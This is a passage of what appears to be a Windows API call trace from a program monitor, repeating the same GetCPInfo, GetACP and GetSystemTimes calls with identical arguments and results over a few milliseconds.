CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.440] GetACP () returned 0x4e4 [0077.440] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.440] GetACP () returned 0x4e4 [0077.441] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.441] GetACP () returned 0x4e4 [0077.441] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.441] GetACP () returned 0x4e4 [0077.441] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.441] GetACP () returned 0x4e4 [0077.441] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.441] GetACP () returned 0x4e4 [0077.441] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.441] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.442] GetACP () returned 0x4e4 [0077.442] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.442] GetACP () returned 0x4e4 [0077.442] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.442] GetACP () returned 0x4e4 [0077.442] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.442] GetACP () returned 0x4e4 [0077.442] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.442] GetACP () returned 0x4e4 [0077.442] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.443] GetACP () returned 0x4e4 [0077.443] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.443] GetACP () returned 0x4e4 [0077.443] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.443] GetACP () returned 0x4e4 [0077.443] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.443] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.443] GetACP () returned 0x4e4 [0077.443] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.444] GetACP () returned 0x4e4 [0077.444] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.444] GetACP () returned 0x4e4 [0077.444] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.444] GetACP () returned 0x4e4 [0077.444] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.444] GetACP () returned 0x4e4 [0077.444] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.444] GetACP () returned 0x4e4 [0077.444] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.444] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.445] GetACP () returned 0x4e4 [0077.445] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.445] GetACP () returned 0x4e4 [0077.445] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.445] GetACP () returned 0x4e4 [0077.445] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.445] GetACP () returned 0x4e4 [0077.445] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.445] GetACP () returned 0x4e4 [0077.445] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.445] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.445] GetACP () returned 0x4e4 [0077.445] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.446] GetACP () returned 0x4e4 [0077.446] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.446] GetACP () returned 0x4e4 [0077.446] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.446] GetACP () returned 0x4e4 [0077.446] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.446] GetACP () returned 0x4e4 [0077.446] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.446] GetACP () returned 0x4e4 [0077.446] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.446] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.446] GetACP () returned 0x4e4 [0077.447] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.447] GetACP () returned 0x4e4 [0077.447] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.447] GetACP () returned 0x4e4 [0077.447] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.447] GetACP () returned 0x4e4 [0077.447] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.447] GetACP () returned 0x4e4 [0077.447] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.447] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.447] GetACP () returned 0x4e4 [0077.447] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.448] GetACP () returned 0x4e4 [0077.448] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.448] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.449] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.449] GetACP () returned 0x4e4 [0077.449] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.450] GetACP () returned 0x4e4 [0077.450] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.450] GetACP () returned 0x4e4 [0077.450] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.450] GetACP () returned 0x4e4 [0077.450] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.450] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.450] GetACP () returned 0x4e4 [0077.451] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.451] GetACP () returned 0x4e4 [0077.451] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.451] GetACP () returned 0x4e4 [0077.451] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.451] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.451] GetACP () returned 0x4e4 [0077.451] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.452] GetACP () returned 0x4e4 [0077.452] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.452] GetACP () returned 0x4e4 [0077.452] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.452] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.452] GetACP () returned 0x4e4 [0077.452] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.453] GetACP () returned 0x4e4 [0077.453] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.453] GetACP () returned 0x4e4 [0077.453] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.453] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.453] GetACP () returned 0x4e4 [0077.453] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.454] GetACP () returned 0x4e4 [0077.454] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.454] GetACP () returned 0x4e4 [0077.454] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.454] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.454] GetACP () returned 0x4e4 [0077.454] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.455] GetACP () returned 0x4e4 [0077.455] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.455] GetACP () returned 0x4e4 [0077.455] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.455] GetACP () returned 0x4e4 [0077.455] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.455] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.455] GetACP () returned 0x4e4 [0077.455] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.456] GetACP () returned 0x4e4 [0077.456] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.456] GetACP () returned 0x4e4 [0077.456] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.456] GetACP () returned 0x4e4 [0077.456] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.456] GetACP () returned 0x4e4 [0077.456] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.456] GetACP () returned 0x4e4 [0077.456] 